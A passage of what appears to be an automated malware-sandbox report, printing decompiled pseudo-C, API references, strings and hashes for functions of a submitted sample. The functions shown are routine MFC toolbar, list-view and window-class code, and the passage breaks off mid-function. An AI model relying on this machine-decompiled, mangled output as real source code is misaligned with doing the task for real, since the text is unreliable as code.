						 *((intOrPtr*)(_t157 - 0x30)) = _t94;
						 *0xe17a64(_t156,  *((intOrPtr*)(_t94 + 4)), _t157 + 0x10, 0x825);
						 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 0x68))))();
						 *(_t157 - 0x28) =  *(_t157 - 0x28) & 0x00000000;
						 *((intOrPtr*)(_t157 - 0x2c)) = 0xe1a644;
						 *(_t157 - 4) = 2;
						E00CB9BC6(_t121, _t157 - 0x2c,  *((intOrPtr*)( *_t121 + 0x68)), CreateRectRgnIndirect(_t157 - 0x20));
						E00CBA1B1(_t121, _t157 - 0x2c);
						_t151 =  *( *_t121 + 0x30);
						_t103 =  *((intOrPtr*)(_t157 + 0x30));
						if(_t103 == 0xffffffff) {
							_t103 =  *((intOrPtr*)(E00CC19ED() + 0x40));
						}
						 *0xe17a64(_t103);
						 *_t151();
						_t148 =  *_t121;
						 *0xe17a64(_t156,  *((intOrPtr*)(_t156 - 0xc)), _t157 + 0x10, 0x825);
						 *((intOrPtr*)( *_t121 + 0x68))();
						E00CBA1B1(_t121, 0);
						_t152 =  *( *_t121 + 0x30);
						 *0xe17a64( *((intOrPtr*)(_t157 - 0x38)));
						 *( *( *_t121 + 0x30))();
						 *((intOrPtr*)(_t157 - 0x2c)) = 0xe1a644;
						E00CA2975(E00CB91F0(_t157 - 0x2c, _t147),  *((intOrPtr*)(_t157 - 0x30)));
					}
				}
				return E00DDD50E(_t121, _t148, _t152);
			}

0x00cea6eb
0x00cea6eb
0x00cea6eb
0x00cea6f2
0x00cea6fb
0x00cea6fe
0x00cea701
0x00cea704
0x00cea716
0x00cea717
0x00cea718
0x00cea719
0x00cea71a
0x00cea71d
0x00cea71f
0x00cea722
0x00cea723
0x00cea729
0x00cea72d
0x00cea730
0x00cea760
0x00cea765
0x00cea766
0x00cea767
0x00cea768
0x00cea76b
0x00cea771
0x00cea77a
0x00cea77c
0x00cea77d
0x00cea77e
0x00cea77f
0x00cea780
0x00cea785
0x00cea785
0x00cea785
0x00cea78c
0x00cea791
0x00cea732
0x00cea732
0x00cea736
0x00cea745
0x00cea74e
0x00cea755
0x00cea755
0x00cea798
0x00cea7a1
0x00cea7a9
0x00cea7b0
0x00cea7b1
0x00cea7be
0x00cea7d6
0x00cea7de
0x00cea7e2
0x00cea7ea
0x00cea7f4
0x00cea7fc
0x00cea800
0x00cea808
0x00cea80a
0x00cea80e
0x00cea818
0x00cea827
0x00cea832
0x00cea839
0x00cea83c
0x00cea842
0x00cea849
0x00cea849
0x00cea84f
0x00cea857
0x00cea859
0x00cea86b
0x00cea873
0x00cea87a
0x00cea884
0x00cea889
0x00cea891
0x00cea896
0x00cea8a5
0x00cea8a5
0x00cea798
0x00cea8af

APIs

__EH_prolog3_GS.LIBCMT ref: 00CEA6F2
CreateRectRgnIndirect.GDI32(?), ref: 00CEA81D

Part of subcall function 00CB8F99: __EH_prolog3.LIBCMT ref: 00CB8FA0
Part of subcall function 00CB8F99: CreateSolidBrush.GDI32(?), ref: 00CB8FBB

FillRect.USER32 ref: 00CEA745

Strings

%d%%, xrefs: 00CEA7B8

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CreateRect$BrushFillH_prolog3H_prolog3_IndirectSolid
String ID: %d%%
API String ID: 2254786338-1518462796
Opcode ID: 0ce88a1d38615eab552183c7d674ee32fb92214bea734b33efd2eb09047626aa
Instruction ID: 4b2d59f143ca37fd8342bd22ed44022e0347ae44780688de0a168e86f169030f
Opcode Fuzzy Hash: 0ce88a1d38615eab552183c7d674ee32fb92214bea734b33efd2eb09047626aa
Instruction Fuzzy Hash: 1B512671900209DFCF01EFA5C895AEEBBBAFF49304F054159F81277291CB34AA09CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CF7311 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CF7311(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v20;
				char _v24;
				char _v28;
				void* _v32;
				char _t33;
				void* _t34;
				intOrPtr _t37;
				intOrPtr* _t46;
				intOrPtr _t48;
				intOrPtr* _t56;
				intOrPtr* _t61;
				intOrPtr* _t64;
				intOrPtr* _t66;
				void* _t83;
				char _t89;
				intOrPtr _t91;
				intOrPtr _t92;

				_push(__ecx);
				_push(__esi);
				_push(__edi);
				_t83 = __ecx;
				_t89 = 0;
				_t33 =  *((intOrPtr*)(__ecx + 0xc78));
				_v8 = _t33;
				if(_t33 == 0) {
					L6:
					_t34 = 0;
					goto L7;
				} else {
					_t61 = __ecx + 0xc74;
					while(1) {
						_t66 = _t61;
						_t37 =  *((intOrPtr*)(E00CB29D4(_t83, _t89,  &_v8)));
						if(_t37 == 0) {
							break;
						}
						if(_t89 < 0 ||  *((intOrPtr*)(_t37 + 0x20)) != _a4) {
							_t89 = _t89 + 1;
							if(_v8 != 0) {
								continue;
							} else {
								goto L6;
							}
						} else {
							__eflags = _t89 -  *((intOrPtr*)(_t83 + 0xc80));
							if(_t89 >=  *((intOrPtr*)(_t83 + 0xc80))) {
								goto L6;
							} else {
								_t56 = E00CC0CD8(_t61, _t89);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L6;
								} else {
									E00CB8028(_t61, _t61, _t83, _t56);
									_t34 = 1;
								}
							}
							L7:
							return _t34;
						}
						goto L19;
					}
					E00CAA4E7(_t61, _t66, _t83, _t89, __eflags);
					asm("int3");
					E00DDD52C(0xe0b91c, _t61, _t83, _t89);
					_t85 = _t66;
					E00D52263(_t61, _t66, _t89, __eflags,  &_v24, "MFCToolBars", _a4, 0x10);
					_t91 = _a8;
					_v8 = 0;
					__eflags = _t91 - 0xffffffff;
					if(_t91 == 0xffffffff) {
						_t91 = E00CB7697(_t85);
					}
					E00CA67E1( &_v20);
					__eflags = _a12 - 0xffffffff;
					_v8 = 1;
					if(_a12 != 0xffffffff) {
						_push(_a12);
						_push(_t91);
						E00CA6953( &_v20, "%TsMFCToolBar-%d%x", _v24);
					} else {
						_push(_t91);
						E00CA6953( &_v20, "%TsMFCToolBar-%d", _v24);
					}
					_v32 = 0;
					_v28 = 0;
					_v8 = 2;
					_t46 = E00D52432( &_v32, 0, 0);
					_t92 = _v20;
					 *0xe17a64(_t92, 0);
					_t48 =  *((intOrPtr*)( *((intOrPtr*)( *_t46 + 0x1c))))();
					_t64 = _v32;
					_v20 = _t48;
					__eflags = _t64;
					if(_t64 != 0) {
						 *0xe17a64(1);
						_t48 =  *((intOrPtr*)( *((intOrPtr*)( *_t64 + 4))))();
					}
					_t29 = _t92 - 0x10; // 0xef
					E00CA2975(E00CA2975(_t48, _t29), _v24 - 0x10);
					return E00DDD4FA(_v20);
				}
				L19:
			}

0x00cf7314
0x00cf7316
0x00cf7317
0x00cf7318
0x00cf731a
0x00cf731c
0x00cf7322
0x00cf7327
0x00cf7353
0x00cf7353
0x00000000
0x00cf7329
0x00cf7329
0x00cf732f
0x00cf7332
0x00cf733a
0x00cf733e
0x00000000
0x00000000
0x00cf7342
0x00cf734c
0x00cf7351
0x00000000
0x00000000
0x00000000
0x00000000
0x00cf735c
0x00cf735c
0x00cf7362
0x00000000
0x00cf7364
0x00cf7367
0x00cf736c
0x00cf736e
0x00000000
0x00cf7370
0x00cf7373
0x00cf737a
0x00cf737a
0x00cf736e
0x00cf7355
0x00cf7359
0x00cf7359
0x00000000
0x00cf7342
0x00cf737d
0x00cf7382
0x00cf738a
0x00cf738f
0x00cf739d
0x00cf73a5
0x00cf73aa
0x00cf73ad
0x00cf73b0
0x00cf73b9
0x00cf73b9
0x00cf73be
0x00cf73c3
0x00cf73ca
0x00cf73ce
0x00cf73e4
0x00cf73e7
0x00cf73f1
0x00cf73d0
0x00cf73d0
0x00cf73da
0x00cf73df
0x00cf73f9
0x00cf73fc
0x00cf7404
0x00cf7408
0x00cf740d
0x00cf741c
0x00cf7424
0x00cf7426
0x00cf7429
0x00cf742c
0x00cf742e
0x00cf7439
0x00cf7441
0x00cf7441
0x00cf7443
0x00cf7451
0x00cf745e
0x00cf745e
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00CF738A

Strings

%TsMFCToolBar-%d, xrefs: 00CF73D4
MFCToolBars, xrefs: 00CF7397
%TsMFCToolBar-%d%x, xrefs: 00CF73EB

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3
String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$MFCToolBars
API String ID: 431132790-2016111687
Opcode ID: 9f7c9d39c0499e56adb1f8d9eccfd66914d6309f945b5335b25d6c97d49062cc
Instruction ID: 60585faa6560f55f9a5d3c2d2505e464f8adf45d1342442d7940f0fa9fe83120
Opcode Fuzzy Hash: 9f7c9d39c0499e56adb1f8d9eccfd66914d6309f945b5335b25d6c97d49062cc
Instruction Fuzzy Hash: 5241D731A0421AABDF04EFB4C8819FFB779EF45314F144629ED21A7291DB709E09EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CFA5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00CFA5C0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t76;
				struct tagRECT* _t77;
				void* _t78;

				_push(0x110);
				E00DDD55F(0xe0bbc5, __ebx, __edi, __esi);
				_t76 = __ecx;
				 *((intOrPtr*)(_t78 - 0x114)) = __ecx;
				 *((intOrPtr*)(_t78 - 0x118)) = __ecx;
				_t74 = __ecx + 4;
				 *((intOrPtr*)(_t78 - 0x11c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0xe2106c;
				E00CA67E1(__ecx + 4);
				 *((intOrPtr*)(_t76 + 8)) =  *((intOrPtr*)(_t78 + 0xc));
				_t77 = _t76 + 0x10;
				 *((intOrPtr*)(_t78 - 4)) = 0;
				_t77->left = 0;
				_t77->top = 0;
				_t77->right = 0;
				_t77->bottom = 0;
				_t64 =  *((intOrPtr*)(_t78 - 0x114));
				 *((intOrPtr*)(_t64 + 0x20)) =  *((intOrPtr*)(_t78 + 0x10));
				 *((intOrPtr*)(_t64 + 0x28)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t64 + 0x44)) =  *((intOrPtr*)(_t78 + 0x18));
				E00CA68A8(_t74,  *((intOrPtr*)(_t78 + 8)));
				SetRectEmpty(_t77);
				_t60 =  *((intOrPtr*)(_t78 - 0x114));
				 *(_t60 + 0x2c) =  *(_t60 + 0x2c) | 0xffffffff;
				 *(_t60 + 0x30) =  *(_t60 + 0x30) | 0xffffffff;
				_t48 =  *((intOrPtr*)(_t60 + 0x20));
				 *((intOrPtr*)(_t60 + 0x34)) = 1;
				 *((intOrPtr*)(_t60 + 0x24)) = 0;
				 *((intOrPtr*)(_t60 + 0xc)) = 0;
				 *((intOrPtr*)(_t60 + 0x3c)) = 0;
				 *((intOrPtr*)(_t60 + 0x40)) = 0;
				_t80 = _t48;
				if(_t48 == 0) {
					 *(_t60 + 0x38) = 0;
				} else {
					GetClassNameA( *(_t48 + 0x20), _t78 - 0x110, 0xff);
					_push(_t78 - 0x110);
					E00CA2ABC(_t60, _t78 - 0x114, _t74, _t77, _t80);
					_push("SysListView32");
					 *(_t60 + 0x38) = E00CBFB65(_t60, _t74, _t77, _t78 - 0x114) & 0x000000ff;
					E00CA2975(E00CBFB65(_t60, _t74, _t77, _t78 - 0x114) & 0x000000ff,  *((intOrPtr*)(_t78 - 0x114)) - 0x10);
				}
				return E00DDD50E(_t60, _t74, _t77);
			}

0x00cfa5c0
0x00cfa5ca
0x00cfa5cf
0x00cfa5d1
0x00cfa5d7
0x00cfa5e0
0x00cfa5e3
0x00cfa5eb
0x00cfa5f1
0x00cfa5fb
0x00cfa5fe
0x00cfa604
0x00cfa608
0x00cfa60a
0x00cfa60d
0x00cfa610
0x00cfa613
0x00cfa619
0x00cfa61f
0x00cfa625
0x00cfa62a
0x00cfa630
0x00cfa636
0x00cfa63e
0x00cfa642
0x00cfa646
0x00cfa649
0x00cfa650
0x00cfa653
0x00cfa656
0x00cfa659
0x00cfa65c
0x00cfa65e
0x00cfa6b0
0x00cfa660
0x00cfa66f
0x00cfa67b
0x00cfa682
0x00cfa68d
0x00cfa6a3
0x00cfa6a9
0x00cfa6a9
0x00cfa6ba

APIs

__EH_prolog3_GS.LIBCMT ref: 00CFA5CA
SetRectEmpty.USER32 ref: 00CFA630
GetClassNameA.USER32(?,?,000000FF), ref: 00CFA66F

Part of subcall function 00CA2ABC: __EH_prolog3.LIBCMT ref: 00CA2AC3

Strings

SysListView32, xrefs: 00CFA68D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ClassEmptyH_prolog3H_prolog3_NameRect
String ID: SysListView32
API String ID: 2163624645-78025650
Opcode ID: 24d8f374db892794ac101e0eb7fa7dd1f75f87ce3d6673a5b4eb3483411b7474
Instruction ID: 84c567eece4b92fde0906aa31d04dded0eb5edd7fb72288bab51a5fc1781e165
Opcode Fuzzy Hash: 24d8f374db892794ac101e0eb7fa7dd1f75f87ce3d6673a5b4eb3483411b7474
Instruction Fuzzy Hash: D63118B09042198FCB58DF18D9829E9BBF4FF08710F1045AEE95A9B392D7709A81CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00CF212E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CF212E(intOrPtr __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t30;
				intOrPtr* _t42;
				intOrPtr* _t43;
				void* _t64;
				void* _t68;

				_t68 = __eflags;
				E00DDD52C(0xe0ab4d, __ebx, __edi, __esi);
				E00D52263(__ebx, __edi, __esi, _t68, _t64 - 0x14, "MFCToolBars",  *((intOrPtr*)(_t64 + 8)), 0x14);
				 *((intOrPtr*)(_t64 - 0x18)) = 0;
				 *((intOrPtr*)(_t64 - 4)) = 0;
				E00CA67E1(_t64 - 0x10);
				 *((char*)(_t64 - 4)) = 1;
				E00CA6953(_t64 - 0x10, "%TsMFCToolBarParameters",  *((intOrPtr*)(_t64 - 0x14)));
				 *((intOrPtr*)(_t64 - 0x20)) = 0;
				 *((intOrPtr*)(_t64 - 0x1c)) = 0;
				 *((char*)(_t64 - 4)) = 2;
				_t30 = E00D52432(_t64 - 0x20, 0, 1);
				_t63 =  *((intOrPtr*)(_t64 - 0x10));
				_t42 = _t30;
				 *0xe17a64( *((intOrPtr*)(_t64 - 0x10)));
				if( *((intOrPtr*)( *((intOrPtr*)( *_t42 + 0x10))))() != 0) {
					 *0xe17a64("LargeIcons", 0xe87394);
					 *((intOrPtr*)(_t64 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)( *_t42 + 0x54))))();
				}
				_t43 =  *((intOrPtr*)(_t64 - 0x20));
				if(_t43 != 0) {
					 *0xe17a64(1);
					_t32 =  *((intOrPtr*)( *((intOrPtr*)( *_t43 + 4))))();
				}
				E00CA2975(E00CA2975(_t32, _t63 - 0x10),  *((intOrPtr*)(_t64 - 0x14)) - 0x10);
				return E00DDD4FA( *((intOrPtr*)(_t64 - 0x18)));
			}

0x00cf212e
0x00cf2135
0x00cf2146
0x00cf2153
0x00cf2156
0x00cf2159
0x00cf2164
0x00cf216e
0x00cf2176
0x00cf2179
0x00cf2182
0x00cf2186
0x00cf218b
0x00cf218e
0x00cf2198
0x00cf21a4
0x00cf21b7
0x00cf21c1
0x00cf21c1
0x00cf21c4
0x00cf21c9
0x00cf21d4
0x00cf21dc
0x00cf21dc
0x00cf21ec
0x00cf21f9

APIs

__EH_prolog3.LIBCMT ref: 00CF2135

Part of subcall function 00D52263: __EH_prolog3.LIBCMT ref: 00D5226A
Part of subcall function 00D52263: _strlen.LIBCMT ref: 00D522A1

Strings

MFCToolBars, xrefs: 00CF2140
%TsMFCToolBarParameters, xrefs: 00CF2168
LargeIcons, xrefs: 00CF21AD

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3$_strlen
String ID: %TsMFCToolBarParameters$LargeIcons$MFCToolBars
API String ID: 3239654323-953485693
Opcode ID: 0d1f9d3a899a529bdc4e6473db2fc7f25513bc6ff789149d310237e3f78b0c7a
Instruction ID: ea4d61adf3b6198d797b4b1b04b7e47445562ce85616dc27c927383c6fd84ac7
Opcode Fuzzy Hash: 0d1f9d3a899a529bdc4e6473db2fc7f25513bc6ff789149d310237e3f78b0c7a
Instruction Fuzzy Hash: 72217F70A0031A9BCF04EFA4CCC2AFEB776BF59304F144469E90577392DA74AA09CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CD613B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00CD613B(void* __ebx, void* __ecx, int __edi, void* __esi, void* __eflags) {
				intOrPtr* _t39;
				void* _t41;
				void* _t42;

				_t38 = __edi;
				_t32 = __ebx;
				_push(0x18);
				E00DDD55F(0xe0a1b6, __ebx, __edi, __esi);
				_t41 = __ecx;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					L7:
					__eflags = 0;
				} else {
					_t32 = 0;
					_t46 =  *((intOrPtr*)(__ecx + 0x110));
					if( *((intOrPtr*)(__ecx + 0x110)) != 0) {
						goto L7;
					} else {
						 *(_t42 - 0x20) = 0;
						 *((intOrPtr*)(_t42 - 0x1c)) = 0;
						 *((intOrPtr*)(_t42 - 0x18)) = 0;
						 *((intOrPtr*)(_t42 - 0x14)) = 0;
						SetRectEmpty(_t42 - 0x20);
						_t39 = E00CA9583(_t46, 0x80);
						 *((intOrPtr*)(_t42 - 0x24)) = _t39;
						 *(_t42 - 4) = 0;
						if(_t39 == 0) {
							_t39 = 0;
						} else {
							E00CB079B(_t39);
							 *_t39 = 0xe1dfa8;
						}
						 *(_t42 - 4) =  *(_t42 - 4) | 0xffffffff;
						_t32 = 0xe4bcbb;
						 *((intOrPtr*)(_t41 + 0x110)) = _t39;
						E00CB216F(_t39, 0x200, "SysListView32", 0xe4bcbb, 0x5000420d, _t42 - 0x20, _t41, 1, 0xe4bcbb);
						_t38 = 0;
						SendMessageA( *( *((intOrPtr*)(_t41 + 0x110)) + 0x20), 0x1036, 0, 0x20);
						E00CD77A1( *((intOrPtr*)(_t41 + 0x110)), 0, 0xe4bcbb, 0, 0xffffffff, 0xffffffff);
					}
				}
				return E00DDD50E(_t32, _t38, _t41);
			}

0x00cd613b
0x00cd613b
0x00cd613b
0x00cd6142
0x00cd6147
0x00cd614b
0x00cd6208
0x00cd6208
0x00cd615b
0x00cd615b
0x00cd615d
0x00cd6163
0x00000000
0x00cd6169
0x00cd616c
0x00cd6170
0x00cd6173
0x00cd6176
0x00cd6179
0x00cd6189
0x00cd618c
0x00cd618f
0x00cd6194
0x00cd61a5
0x00cd6196
0x00cd6198
0x00cd619d
0x00cd619d
0x00cd61a7
0x00cd61b8
0x00cd61bd
0x00cd61d0
0x00cd61db
0x00cd61e8
0x00cd61fb
0x00cd6200
0x00cd6163
0x00cd620f

APIs

__EH_prolog3_GS.LIBCMT ref: 00CD6142
SetRectEmpty.USER32(00000000), ref: 00CD6179
SendMessageA.USER32(00000000,00001036,00000000,00000020), ref: 00CD61E8

Strings

SysListView32, xrefs: 00CD61C4

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: EmptyH_prolog3_MessageRectSend
String ID: SysListView32
API String ID: 1451865993-78025650
Opcode ID: 54ff79d54355125ee94d97718015d9e91770ffcc54b565181acd2f33b383de31
Instruction ID: a0e582f6e6c7118ae90498e7e9341f8f2565da77dfb082f009812b6af59c48ce
Opcode Fuzzy Hash: 54ff79d54355125ee94d97718015d9e91770ffcc54b565181acd2f33b383de31
Instruction Fuzzy Hash: AF119070A04309ABDB259FA58C86AEFB6B5FB88714F10061EF275672C1CBB44E41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CD9095 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00CD9095(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t24;
				struct HICON__* _t26;
				int _t30;
				struct HICON__* _t41;
				void* _t44;
				struct HINSTANCE__* _t46;
				CHAR** _t48;
				void* _t49;

				_t44 = __edx;
				_push(0x2c);
				E00DDD52C(0xe0a4ba, __ebx, __edi, __esi);
				 *(_t49 - 4) = 0;
				 *((intOrPtr*)(_t49 - 0x10)) = 0;
				_t53 =  *((intOrPtr*)(_t49 + 0xc));
				if( *((intOrPtr*)(_t49 + 0xc)) == 0) {
					_t24 = E00CAA4E7(0, __ecx, __edi, __esi, __eflags);
					asm("int3");
					 *0xe872d8 =  *0xe872d8 & 0x00000000;
					__eflags =  *0xe872d8;
					return _t24;
				} else {
					_t46 =  *(E00CACEEE(0, __edi, __esi, _t53) + 8);
					_t26 = LoadCursorA(0, 0x7f00);
					_t48 =  *(_t49 + 8);
					_t41 = _t26;
					_t43 = _t48;
					E00CA67E1(_t48);
					 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
					_push(0x10);
					_push(_t41);
					_push(8);
					_push(_t46);
					 *((intOrPtr*)(_t49 - 0x10)) = 1;
					E00CA6953(_t48, "%Ts:%x:%x:%x:%x",  *((intOrPtr*)(_t49 + 0xc)));
					_t30 = GetClassInfoA(_t46,  *_t48, _t49 - 0x38);
					_t54 = _t30;
					if(_t30 == 0) {
						 *((intOrPtr*)(_t49 - 0x34)) = DefWindowProcA;
						 *((intOrPtr*)(_t49 - 0x2c)) = 0;
						 *((intOrPtr*)(_t49 - 0x30)) = 0;
						 *((intOrPtr*)(_t49 - 0x24)) = 0;
						 *((intOrPtr*)(_t49 - 0x18)) = 0;
						 *(_t49 - 0x14) =  *_t48;
						_push(_t49 - 0x38);
						 *(_t49 - 0x38) = 8;
						 *(_t49 - 0x28) = _t46;
						 *(_t49 - 0x20) = _t41;
						 *((intOrPtr*)(_t49 - 0x1c)) = 0x10;
						if(E00CB119B(_t41, _t43, _t46, _t48, _t54) == 0) {
							E00CB9B50(_t41, _t43, _t44);
						}
					}
					return E00DDD4FA(_t48);
				}
			}

0x00cd9095
0x00cd9095
0x00cd909c
0x00cd90a3
0x00cd90a6
0x00cd90a9
0x00cd90ac
0x00cd9150
0x00cd9155
0x00cd9156
0x00cd9156
0x00cd915d
0x00cd90b2
0x00cd90bd
0x00cd90c0
0x00cd90c6
0x00cd90c9
0x00cd90cb
0x00cd90cd
0x00cd90d2
0x00cd90d6
0x00cd90d8
0x00cd90d9
0x00cd90db
0x00cd90df
0x00cd90ec
0x00cd90fb
0x00cd9101
0x00cd9103
0x00cd910a
0x00cd910f
0x00cd9112
0x00cd9115
0x00cd9118
0x00cd911d
0x00cd9123
0x00cd9124
0x00cd912b
0x00cd912e
0x00cd9131
0x00cd913f
0x00cd9141
0x00cd9141
0x00cd913f
0x00cd914d
0x00cd914d

APIs

__EH_prolog3.LIBCMT ref: 00CD909C
LoadCursorA.USER32 ref: 00CD90C0
GetClassInfoA.USER32 ref: 00CD90FB

Part of subcall function 00CB119B: __EH_prolog3_catch.LIBCMT ref: 00CB11A2
Part of subcall function 00CB119B: GetClassInfoA.USER32 ref: 00CB11B4

Strings

%Ts:%x:%x:%x:%x, xrefs: 00CD90E6

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ClassInfo$CursorH_prolog3H_prolog3_catchLoad
String ID: %Ts:%x:%x:%x:%x
API String ID: 937286869-4057404147
Opcode ID: 1ab2cb0953d0c79335ef0e8d3c472eedf815e63799261ea32adcabe02e450c86
Instruction ID: 846f88aa469af8171ba2ae6089a793f98555e0b88061206fb9ff9a528f22a3bd
Opcode Fuzzy Hash: 1ab2cb0953d0c79335ef0e8d3c472eedf815e63799261ea32adcabe02e450c86
Instruction Fuzzy Hash: 9B212CB0900209AFDB50EFA5D885BDEBAF4FF08714F10802AF558F7251D7B45A44DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00CB84A7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00CB84A7(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int* _v32;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t12;
				signed int* _t14;
				intOrPtr* _t18;
				signed int* _t26;
				void* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t37;
				struct HINSTANCE__* _t38;
				signed int _t39;

				_t34 = __edi;
				_t33 = __edx;
